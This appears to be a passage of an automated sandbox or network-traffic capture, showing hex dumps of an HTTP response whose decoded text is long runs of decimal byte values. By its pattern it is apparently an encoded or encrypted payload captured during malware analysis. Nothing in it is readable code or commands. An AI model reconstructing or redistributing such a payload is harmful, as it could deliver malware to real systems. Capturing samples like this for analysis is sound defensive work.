                    2021-10-26 16:59:17 UTC5INData Raw: 38 20 33 36 20 31 36 31 20 31 38 20 32 34 36 20 38 34 20 31 31 34 20 31 31 37 20 39 34 20 31 32 32 20 35 32 20 33 39 20 31 36 33 20 32 32 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 39 20 39 34 20 34 38 20 33 38 20 32 34 20 33 33 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 31 31 35 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 36 35 20 31 20 38 34 20 31 31 34 20 31 32 37 20 31 31 36 20 39 33 20 32 36 20 32 32 20 36 35 20 31 34 20 38 34 20 31 31 34 20 31 32 37 20 31 32 32 20 39 33 20 32 30 20 32 32 20 36 35 20 31 35 20 38 34 20 31 31 34 20 31 32 37 20 31 32 33 20 39 32 20 32 32 20 32 32 20 36 35 20 31 32 20 38 34 20 31 31 34 20 31 32 37 20 32 33 37 20 31 31 36 20 35 30 20 34 38 20
                    Data Ascii: 8 36 161 18 246 84 114 117 94 122 52 39 163 22 252 114 117 109 94 48 38 24 33 126 114 117 109 115 2 57 50 115 84 114 117 109 112 50 48 65 1 84 114 127 116 93 26 22 65 14 84 114 127 122 93 20 22 65 15 84 114 127 123 92 22 22 65 12 84 114 127 237 116 50 48
                    2021-10-26 16:59:17 UTC6INData Raw: 33 20 31 32 37 20 31 31 36 20 38 33 20 37 30 20 31 35 38 20 32 30 20 32 37 20 31 39 35 20 32 38 20 38 37 20 31 30 38 20 31 31 31 20 36 34 20 31 31 37 20 32 30 20 32 38 20 33 39 20 32 39 20 38 37 20 38 34 20 39 34 20 31 34 38 20 38 30 20 32 33 31 20 31 36 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 31 31 36 20 35 30 20 35 34 20 39 34 20 38 20 31 31 39 20 31 31 31 20 31 32 20 35 33 20 34 38 20 35 30 20 35 30 20 35 39 20 31 31 33 20 31 31 37 20 31 30 39 20 39 31 20 32 34 20 34 38 20 35 30 20 34 35 20 31 30 30 20 31 31 39 20 31 31 37 20 31 30 34 20 31 31 33 20 35 30 20 34 38 20 35 39 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 35 20 31 32 30 20 35 30 20 34 38 20 34 31 20 32 36 20 37 30 20 31 32 35 20 31 31
                    Data Ascii: 3 127 116 83 70 158 20 27 195 28 87 108 111 64 117 20 28 39 29 87 84 94 148 80 231 16 226 40 124 141 117 109 118 65 116 50 54 94 8 119 111 12 53 48 50 50 59 113 117 109 91 24 48 50 45 100 119 117 104 113 50 48 59 54 84 99 119 225 120 50 48 41 26 70 125 11
                    2021-10-26 16:59:17 UTC8INData Raw: 34 33 20 31 32 35 20 31 30 39 20 31 31 32 20 34 31 20 32 36 20 32 30 20 32 39 20 31 34 30 20 38 34 20 39 34 20 31 33 39 20 38 36 20 32 35 20 31 39 33 20 33 33 20 36 20 38 30 20 31 31 34 20 31 30 34 20 31 30 39 20 31 31 32 20 35 30 20 35 39 20 35 30 20 35 34 20 36 39 20 31 31 32 20 31 30 37 20 31 31 35 20 39 33 20 33 32 20 32 32 20 34 39 20 34 35 20 36 36 20 39 34 20 31 32 32 20 37 35 20 38 38 20 39 36 20 34 38 20 35 30 20 36 30 20 31 32 34 20 33 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 34 20 32 32 20 32 35 20 32 31 38 20 31 31 34 20 38 39 20 31 35 34 20 31 30 39 20 31 31 32 20 35 30 20 33 35 20 32 20 35 33 20 38 34 20 31 32 35 20 31 31 37 20 31 30 39 20 31 31 32 20 36 32 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 36 20 39 38 20 36 34 20 31 31 39 20
                    Data Ascii: 43 125 109 112 41 26 20 29 140 84 94 139 86 25 193 33 6 80 114 104 109 112 50 59 50 54 69 112 107 115 93 32 22 49 45 66 94 122 75 88 96 48 50 60 124 33 117 109 122 24 22 25 218 114 89 154 109 112 50 35 2 53 84 125 117 109 112 62 48 50 39 86 106 98 64 119
                    2021-10-26 16:59:17 UTC9INData Raw: 34 20 35 34 20 38 34 20 31 31 34 20 31 30 37 20 31 30 39 20 31 31 32 20 35 30 20 32 38 20 35 30 20 35 34 20 38 34 20 38 39 20 36 37 20 39 38 20 31 31 32 20 37 33 20 31 38 31 20 35 30 20 35 34 20 38 30 20 39 30 20 31 31 30 20 31 30 39 20 31 31 32 20 35 32 20 32 37 20 32 36 20 35 37 20 38 34 20 39 20 32 34 30 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 34 36 20 35 34 20 38 34 20 31 31 36 20 39 34 20 31 31 39 20 31 32 37 20 35 30 20 37 35 20 31 38 33 20 35 34 20 38 34 20 31 31 38 20 39 33 20 31 31 32 20 31 31 32 20 35 30 20 35 34 20 32 35 20 35 38 20 39 31 20 31 31 34 20 31 34 20 32 33 32 20 31 31 32 20 35 30 20 35 32 20 32 36 20 34 30 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 37 20 31 31 34 20 32 39 20 31
                    Data Ascii: 4 54 84 114 107 109 112 50 28 50 54 84 89 67 98 112 73 181 50 54 80 90 110 109 112 52 27 26 57 84 9 240 109 112 54 24 46 54 84 116 94 119 127 50 75 183 54 84 118 93 112 112 50 54 25 58 91 114 14 232 112 50 52 26 40 84 114 115 71 112 50 48 33 6 87 114 29 1
                    2021-10-26 16:59:17 UTC10INData Raw: 35 20 32 34 39 20 35 33 20 33 39 20 38 32 20 32 35 34 20 36 31 20 31 30 39 20 31 31 32 20 35 31 20 39 35 20 31 30 35 20 35 34 20 38 34 20 31 32 30 20 39 34 20 35 39 20 39 37 20 35 34 20 37 35 20 33 32 20 35 34 20 38 34 20 31 31 38 20 31 32 35 20 36 37 20 31 32 36 20 33 35 20 35 32 20 35 38 20 37 35 20 37 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 33 20 31 37 38 20 35 38 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 33 20 32 32 20 31 30 30 20 35 30 20 34 38 20 35 34 20 33 39 20 38 31 20 39 30 20 34 37 20 31 30 38 20 31 31 32 20 35 32 20 32 39 20 32 38 20 34 39 20 36 39 20 31 31 36 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 31 32 32 20 32 34 30 20 35 39 20 34 38 20 35 30 20 35 30 20 31 31
                    Data Ascii: 5 249 53 39 82 254 61 109 112 51 95 105 54 84 120 94 59 97 54 75 32 54 84 118 125 67 126 35 52 58 75 70 114 117 105 103 178 58 50 54 80 99 113 22 100 50 48 54 39 81 90 47 108 112 52 29 28 49 69 116 249 37 112 50 49 93 109 84 114 127 122 240 59 48 50 50 11
                    2021-10-26 16:59:17 UTC12INData Raw: 30 20 31 31 39 20 32 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 38 36 20 35 35 20 38 34 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 36 36 20 35 31 20 35 34 20 38 34 20 38 35 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 36 20 34 38 20 35 30 20 35 35 20 38 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 33 34 20 35 30 20 34 38 20 35 30 20 31 33 35 20 38 34 20 31 31 34 20 31 31 37 20 32 30 32 20 31 31 33 20 35 30 20 34 38 20 36 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 32 32 33 20 34 39 20 35 30 20 35 34 20 31 38 35 20 31 31 35 20 31 31 37 20 31 30 39 20 38 30 20 35 30 20 34 38 20 35 30 20 31 31
                    Data Ascii: 0 119 24 114 117 109 112 50 48 86 55 84 114 123 109 112 50 66 51 54 84 85 117 109 112 116 48 50 55 86 114 117 109 134 50 48 50 135 84 114 117 202 113 50 48 60 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 223 49 50 54 185 115 117 109 80 50 48 50 11
                    2021-10-26 16:59:17 UTC13INData Raw: 35 34 20 31 38 38 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 35 38 20 35 30 20 32 35 20 33 37 20 35 35 20 39 30 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 38 20 35 34 20 31 31 33 20 31 31 34 20 31 31 37 20 31 30 39 20 39 39 20 35 30 20 34 38 20 33 35 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 33 20 33 37 20 33 38 20 33 37 20 31 38 37 20 33 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 33 31 20 33 33 20 32 30 20 34 38 20 36 36 20 31 31 32 20 32 34 39 20 37 37 20 31 31 32 20 35 30 20 34 39 20 31 34 34 20 34 38 20 31 32 34 20 31 39 36 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 35 38 20 32 35 20 32 31 39 20 38 34 20 31 31 34 20 31 31 37 20 36 33 20 31 34 20 31 31 33 20 34 38
                    Data Ascii: 54 188 51 38 84 114 119 109 158 50 25 37 55 90 114 117 109 112 33 0 58 54 113 114 117 109 99 50 48 35 72 23 114 117 105 103 37 38 37 187 38 114 117 108 107 31 33 20 48 66 112 249 77 112 50 49 144 48 124 196 117 109 118 24 58 25 219 84 114 117 63 14 113 48
                    2021-10-26 16:59:17 UTC14INData Raw: 31 33 20 35 30 20 35 34 20 35 30 20 35 34 20 38 34 20 31 30 30 20 31 31 37 20 31 30 39 20 39 37 20 37 36 20 31 33 20 35 30 20 35 34 20 38 30 20 38 38 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 38 20 35 30 20 35 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 34 32 20 37 39 20 39 35 20 31 31 34 20 37 35 20 38 38 20 31 31 35 20 34 38 20 35 30 20 36 30 20 31 32 36 20 38 34 20 39 34 20 31 35 34 20 31 31 32 20 34 39 20 30 20 35 39 20 35 34 20 31 31 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 31 32 34 20 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 34 38 20 35 31 20 34 34 20 32 37 20 39 34 20 38 34 20 38 33 20 31 31 31 20 31 31 36 20 34 34 20 32 39 20 35 36 20 31 36 20
                    Data Ascii: 13 50 54 50 54 84 100 117 109 97 76 13 50 54 80 88 117 109 115 2 58 50 57 84 114 117 109 112 50 48 48 42 79 95 114 75 88 115 48 50 60 126 84 94 154 112 49 0 59 54 119 114 117 109 112 50 48 50 52 124 51 117 109 122 48 51 44 27 94 84 83 111 116 44 29 56 16
                    2021-10-26 16:59:17 UTC16INData Raw: 31 34 20 31 31 33 20 36 34 20 31 31 38 20 32 35 20 35 31 20 32 30 20 32 39 20 31 36 30 20 38 38 20 31 31 39 20 31 32 33 20 31 30 31 20 33 31 20 33 34 20 32 30 20 37 37 20 37 37 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 35 20 34 36 20 34 35 20 33 31 20 36 30 20 31 31 34 20 32 39 20 32 34 20 31 30 39 20 31 31 32 20 35 36 20 32 36 20 32 30 20 32 39 20 31 38 34 20 38 34 20 39 34 20 31 35 33 20 31 31 35 20 32 20 35 38 20 35 30 20 36 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 33 32 20 37 34 20 39 35 20 31 32 37 20 37 35 20 31 31 20 34 33 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 36 20 39 34 20 31 31 30 20 38 36 20 32 35 20 31 39 36 20 32 34 20 35 32 20 37 36 20 31 30 37 20 38 38 20 31 32 37 20 38 36 20 37 33
                    Data Ascii: 14 113 64 118 25 51 20 29 160 88 119 123 101 31 34 20 77 77 114 117 105 115 46 45 31 60 114 29 24 109 112 56 26 20 29 184 84 94 153 115 2 58 50 6 84 114 117 109 112 50 48 48 32 74 95 127 75 11 43 48 50 50 121 116 94 110 86 25 196 24 52 76 107 88 127 86 73
                    2021-10-26 16:59:17 UTC17INData Raw: 34 20 32 39 20 37 20 31 30 39 20 31 31 32 20 35 36 20 32 36 20 32 30 20 32 39 20 31 36 33 20 39 32 20 31 31 20 34 36 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 34 39 20 38 35 20 31 31 34 20 31 31 35 20 37 31 20 39 39 20 32 20 35 35 20 35 30 20 36 37 20 38 34 20 31 31 34 20 31 31 37 20 31 32 32 20 31 31 32 20 35 30 20 33 33 20 35 35 20 32 37 20 31 31 33 20 31 31 32 20 31 34 20 31 31 38 20 31 31 32 20 35 30 20 35 32 20 31 38 20 31 38 34 20 31 32 30 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 36 39 20 33 32 20 31 31 34 20 31 31 37 20 31 30 33 20 38 30 20 31 30 31 20 32 38 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 31 20 35 30 20 35 34 20 38 32 20 38 38 20 31 31 20 34 36
                    Data Ascii: 4 29 7 109 112 56 26 20 29 163 92 11 46 112 50 52 93 149 85 114 115 71 99 2 55 50 67 84 114 117 122 112 50 33 55 27 113 112 14 118 112 50 52 18 184 120 162 107 69 143 50 48 52 69 32 114 117 103 80 101 28 226 40 124 141 117 109 118 26 131 50 54 82 88 11 46
                    2021-10-26 16:59:17 UTC18INData Raw: 35 36 20 32 37 20 35 30 20 34 38 20 32 31 38 20 31 39 37 20 33 31 20 31 30 35 20 31 31 39 20 31 30 37 20 32 34 20 36 39 20 35 34 20 38 34 20 31 32 30 20 32 38 20 31 32 33 20 39 32 20 33 39 20 32 32 20 35 38 20 34 38 20 36 36 20 31 32 33 20 32 36 20 32 31 20 31 31 32 20 35 30 20 35 38 20 35 33 20 36 33 20 36 32 20 34 32 20 31 32 36 20 31 30 36 20 31 31 36 20 31 20 32 33 37 20 32 35 20 35 33 20 38 39 20 38 39 20 31 35 36 20 31 30 31 20 33 31 20 37 35 20 34 38 20 35 30 20 36 30 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 37 20 32 20 35 31 20 35 30 20 31 30 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 39 20 31 31 32 20 35 30 20 33 33 20 33 32 20 35 34 20 31 37 30 20 31 30 33 20 36 34 20 31 30 39 20 31 31 32 20 34 38 20 35 30 20 36 35 20 37 36 20
                    Data Ascii: 56 27 50 48 218 197 31 105 119 107 24 69 54 84 120 28 123 92 39 22 58 48 66 123 26 21 112 50 58 53 63 62 42 126 106 116 1 237 25 53 89 89 156 101 31 75 48 50 60 126 114 117 109 107 2 51 50 104 84 114 117 119 112 50 33 32 54 170 103 64 109 112 48 50 65 76
                    2021-10-26 16:59:17 UTC20INData Raw: 20 39 34 20 31 31 38 20 37 36 20 37 39 20 35 30 20 35 34 20 39 34 20 38 38 20 31 31 39 20 31 31 36 20 31 30 33 20 36 35 20 37 30 20 35 30 20 35 34 20 39 34 20 31 30 35 20 38 38 20 31 31 36 20 38 36 20 35 38 20 31 36 20 35 30 20 35 34 20 34 20 31 31 34 20 31 31 38 20 36 39 20 31 38 20 35 31 20 34 38 20 35 32 20 34 37 20 31 32 31 20 31 32 36 20 38 33 20 31 30 31 20 33 31 20 37 35 20 34 38 20 35 30 20 36 30 20 38 33 20 38 38 20 31 32 31 20 37 30 20 31 34 39 20 35 37 20 32 37 20 31 39 32 20 35 34 20 38 34 20 31 31 34 20 31 30 32 20 39 33 20 31 31 37 20 35 30 20 37 32 20 35 30 20 35 34 20 38 34 20 31 30 38 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 34 31 20 33 37 20 36 39 20 33 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 39 20 33 31 20 33 30 20 32 30 20
                    Data Ascii: 94 118 76 79 50 54 94 88 119 116 103 65 70 50 54 94 105 88 116 86 58 16 50 54 4 114 118 69 18 51 48 52 47 121 126 83 101 31 75 48 50 60 83 88 121 70 149 57 27 192 54 84 114 102 93 117 50 72 50 54 84 108 117 109 97 48 41 37 69 34 114 117 103 109 31 30 20
                    2021-10-26 16:59:17 UTC21INData Raw: 38 20 36 32 20 35 34 20 38 34 20 39 39 20 31 31 39 20 31 31 36 20 31 30 32 20 33 30 20 35 35 20 32 30 20 37 37 20 31 31 32 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 39 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 34 34 20 32 39 20 36 32 20 31 36 20 31 31 34 20 31 31 32 20 31 34 20 37 32 20 31 31 32 20 35 30 20 35 32 20 33 30 20 34 32 20 31 32 37 20 31 31 37 20 38 20 37 33 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 31 37 20 38 36 20 39 20 38 33 20 31 30 39 20 31 31 32 20 35 34 20 33 38 20 34 38 20 37 37 20 31 31 32 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 38 31 20 34 38 20 35 30 20 36 30 20 31 31 34 20 38
                    Data Ascii: 8 62 54 84 99 119 116 102 30 55 20 77 112 114 117 105 90 20 27 197 54 87 66 124 109 92 50 48 50 54 84 114 117 111 115 44 29 62 16 114 112 14 72 112 50 52 30 42 127 117 8 73 112 50 52 25 217 86 9 83 109 112 54 38 48 77 112 114 117 105 31 181 48 50 60 114 8
                    2021-10-26 16:59:17 UTC22INData Raw: 38 38 20 38 20 36 39 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 31 39 20 34 31 20 39 31 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 31 39 33 20 35 30 20 34 35 20 31 30 30 20 31 31 33 20 31 31 37 20 33 38 20 31 31 32 20 35 30 20 34 38 20 31 39 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 20 38 39 20 35 30 20 34 38 20 35 34 20 34 32 20 31 32 31 20 31 32 33 20 38 33 20 31 30 36 20 38 38 20 31 38 37 20 34 38 20 35 30 20 36 30 20 31 32 37 20 31 31 33 20 31 32 36 20 37 30 20 31 33 33 20 34 38 20 37 35 20 32 37 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 32 20 32 35 32 20 35 30 20 34 38 20 35 36 20 32 36 20 36 35 20 31 31 32 20 31 34 20 36 38 20 31 31 32 20 35 30 20 35 32 20 34 39 20 38 39 20 32 31 37 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 35 20
                    Data Ascii: 88 8 69 112 50 52 25 219 41 91 117 109 116 25 193 50 45 100 113 117 38 112 50 48 19 54 84 99 119 22 89 50 48 54 42 121 123 83 106 88 187 48 50 60 127 113 126 70 133 48 75 27 54 84 118 118 2 252 50 48 56 26 65 112 14 68 112 50 52 49 89 217 114 117 103 105
                    2021-10-26 16:59:17 UTC24INData Raw: 33 20 31 31 34 20 31 31 37 20 31 30 39 20 38 33 20 35 30 20 34 38 20 33 35 20 35 32 20 34 37 20 39 31 20 31 31 37 20 31 30 39 20 31 31 36 20 34 32 20 32 39 20 35 39 20 31 36 20 38 33 20 39 30 20 32 35 32 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 34 39 20 36 31 20 31 32 37 20 31 33 35 20 31 31 39 20 32 32 20 38 39 20 35 30 20 34 38 20 35 34 20 35 33 20 35 39 20 32 35 34 20 31 31 37 20 31 30 39 20 31 32 32 20 34 36 20 32 39 20 34 39 20 31 36 20 31 33 38 20 31 32 30 20 31 32 37 20 37 30 20 31 33 39 20 35 33 20 32 34 20 31 38 34 20 35 34 20 38 34 20 31 32 30 20 31 36 39 20 31 30 37 20 39 30 20 35 36 20 34 39 20 33 34 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 32 30 20 31 31 32 20 33 39 20 32 36 20 35 30 20 34 39 20 38 34 20 31 31 34 20 31 31 37 20 31
                    Data Ascii: 3 114 117 109 83 50 48 35 52 47 91 117 109 116 42 29 59 16 83 90 252 109 112 56 27 49 61 127 135 119 22 89 50 48 54 53 59 254 117 109 122 46 29 49 16 138 120 127 70 139 53 24 184 54 84 120 169 107 90 56 49 34 54 84 112 117 120 112 39 26 50 49 84 114 117 1
                    2021-10-26 16:59:17 UTC25INData Raw: 32 32 20 36 35 20 31 34 37 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 33 30 20 32 32 20 36 35 20 31 38 39 20 38 34 20 31 31 34 20 31 32 37 20 32 33 37 20 36 36 20 35 30 20 34 38 20 35 34 20 33 30 20 32 34 32 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 34 39 20 34 38 20 35 30 20 36 30 20 31 32 34 20 32 35 20 31 31 37 20 31 30 39 20 31 31 38 20 33 31 20 34 34 20 32 35 20 33 35 20 32 31 32 20 35 36 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 35 30 20 31 37 38 20 32 38 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 38 38 20 31 37 38 20 32 38 20 35 30 20 35 34 20 38 30 20 38 39 20 31 38 37 20 36 39 20 33 31 20 35 30 20 34 38 20 35 32 20 33 30 20 33 38 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 36 35 20 34 38 20 35 30 20 34 38
                    Data Ascii: 22 65 147 84 114 127 117 93 30 22 65 189 84 114 127 237 66 50 48 54 30 242 114 117 103 88 149 48 50 60 124 25 117 109 118 31 44 25 35 212 56 117 109 116 25 250 178 28 84 114 113 70 188 178 28 50 54 80 89 187 69 31 50 48 52 30 38 114 117 107 88 65 48 50 48
                    2021-10-26 16:59:17 UTC26INData Raw: 31 35 32 20 35 30 20 35 34 20 39 34 20 39 30 20 36 38 20 31 30 38 20 31 31 32 20 35 32 20 39 35 20 31 35 35 20 35 34 20 38 34 20 31 32 30 20 39 33 20 31 39 37 20 31 31 32 20 35 30 20 35 38 20 31 37 38 20 37 32 20 38 34 20 31 31 34 20 31 31 33 20 31 39 20 31 33 20 35 30 20 34 38 20 35 34 20 33 30 20 32 31 33 20 31 31 34 20 31 31 37 20 31 30 37 20 32 34 30 20 37 32 20 34 38 20 35 30 20 35 30 20 31 32 34 20 32 31 36 20 31 31 37 20 31 30 39 20 31 32 32 20 39 33 20 31 35 35 20 35 30 20 35 34 20 39 34 20 32 39 20 32 31 37 20 31 30 39 20 31 31 32 20 35 36 20 34 33 20 32 30 34 20 35 32 20 32 31 32 20 31 34 20 31 31 37 20 31 30 39 20 31 31 36 20 37 36 20 37 33 20 35 30 20 35 34 20 38 30 20 39 30 20 31 30 38 20 31 30 38 20 31 31 32 20 35 32 20 35 38 20 33 32 20 35
                    Data Ascii: 152 50 54 94 90 68 108 112 52 95 155 54 84 120 93 197 112 50 58 178 72 84 114 113 19 13 50 48 54 30 213 114 117 107 240 72 48 50 50 124 216 117 109 122 93 155 50 54 94 29 217 109 112 56 43 204 52 212 14 117 109 116 76 73 50 54 80 90 108 108 112 52 58 32 5
                    2021-10-26 16:59:17 UTC28INData Raw: 32 36 20 36 37 20 31 30 37 20 35 34 20 38 34 20 31 32 30 20 31 32 30 20 31 39 20 39 32 20 35 30 20 34 38 20 35 34 20 38 39 20 32 32 38 20 31 31 34 20 31 31 37 20 31 30 33 20 39 39 20 35 36 20 32 37 20 32 37 20 33 36 20 39 34 20 39 30 20 31 39 36 20 31 30 39 20 31 31 32 20 35 36 20 33 35 20 35 35 20 37 32 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 35 20 39 38 20 35 35 20 32 34 20 31 32 38 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 33 20 31 31 32 20 35 30 20 35 38 20 33 31 20 35 39 20 39 33 20 39 36 20 31 31 32 20 36 39 20 31 39 34 20 35 30 20 34 38 20 35 36 20 38 39 20 31 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 38 20 35 36 20 32 34 20 31 32 39 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 36 33 20 31 37 34 20 36 30 20 33 34 20 35 36 20 32 30 30 20
                    Data Ascii: 26 67 107 54 84 120 120 19 92 50 48 54 89 228 114 117 103 99 56 27 27 36 94 90 196 109 112 56 35 55 72 126 114 117 105 98 55 24 128 54 84 120 26 13 112 50 58 31 59 93 96 112 69 194 50 48 56 89 14 114 117 103 98 56 24 129 54 84 120 88 163 174 60 34 56 200
                    2021-10-26 16:59:17 UTC29INData Raw: 36 39 20 31 30 34 20 31 31 32 20 31 35 33 20 34 39 20 35 30 20 35 34 20 31 32 36 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 38 36 20 38 35 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 32 32 31 20 31 30 39 20 31 31 32 20 35 36 20 33 39 20 33 31 20 36 31 20 31 31 34 20 31 31 36 20 39 33 20 31 39 35 20 31 31 32 20 35 30 20 35 38 20 33 31 20 34 38 20 31 32 37 20 31 31 33 20 31 32 37 20 37 30 20 31 33 31 20 32 34 20 35 34 20 32 36 20 31 35 33 20 38 34 20 31 31 34 20 31 32 37 20 31 31 35 20 39 33 20 33 30 20 32 32 20 35 33 20 33 30 20 31 32 37 20 31 31 35 20 31 31 37 20 31 30 37 20 31 31 30 20 33 31 20 32 31 20 32 30 20 36 33 20 36 36 20 32 33 32 20 31 32 20 39 35 20 31
                    Data Ascii: 69 104 112 153 49 50 54 126 114 117 124 14 79 48 50 50 116 86 85 189 110 26 207 50 54 82 90 221 109 112 56 39 31 61 114 116 93 195 112 50 58 31 48 127 113 127 70 131 24 54 26 153 84 114 127 115 93 30 22 53 30 127 115 117 107 110 31 21 20 63 66 232 12 95 1
                    2021-10-26 16:59:17 UTC30INData Raw: 39 20 36 30 20 35 30 20 34 38 20 35 36 20 33 37 20 38 32 20 39 39 20 31 31 35 20 37 37 20 31 36 36 20 31 39 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 34 38 20 32 34 20 35 36 20 32 31 20 31 31 30 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 31 36 20 38 34 20 31 31 34 20 31 31 37 20 39 20 31 31 33 20 35 30 20 34 38 20 31 38 34 20 35 35 20 38 34 20 31 31 34 20 38 35 20 31 30 39 20 31 31 32 20 35 30 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 31 39 39 20 34 38 20 35 30 20 35 34 20 31 32 37 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 39
                    Data Ascii: 9 60 50 48 56 37 82 99 115 77 166 19 224 44 30 171 114 117 107 88 134 48 50 48 124 19 117 109 122 236 48 24 56 21 110 117 109 112 50 48 50 16 84 114 117 9 113 50 48 184 55 84 114 85 109 112 50 118 50 54 85 105 69 110 112 199 48 50 54 127 114 117 124 14 79
                    2021-10-26 16:59:17 UTC31INData Raw: 20 31 31 38 20 35 30 20 39 33 20 32 32 39 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 37 33 20 31 31 34 20 31 39 34 20 31 38 35 20 31 31 32 20 31 38 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 31 33 35 20 34 38 20 35 30 20 35 34 20 31 32 30 20 31 31 34 20 31 31 37 20 31 32 34 20 38 30 20 32 31 32 20 31 37 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 33 20 35 30 20 35 34 20 38 32 20 31 32 20 38 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 33 30 20 35 34 20 38 34 20 31 32 30 20 31 30 34 20 36 34 20 31 31 38 20 32 30 20 38 20 39 33 20 35 34 20 38 34 20 31 31 34 20 31 32 30 20 37 30 20 31 33 36 20 33 32 20 35 31 20
                    Data Ascii: 118 50 93 229 114 123 109 112 50 48 50 54 73 114 194 185 112 18 118 50 54 85 105 69 110 112 135 48 50 54 120 114 117 124 80 212 17 226 40 124 141 117 109 118 26 133 50 54 82 12 89 109 112 54 95 130 54 84 120 104 64 118 20 8 93 54 84 114 120 70 136 32 51
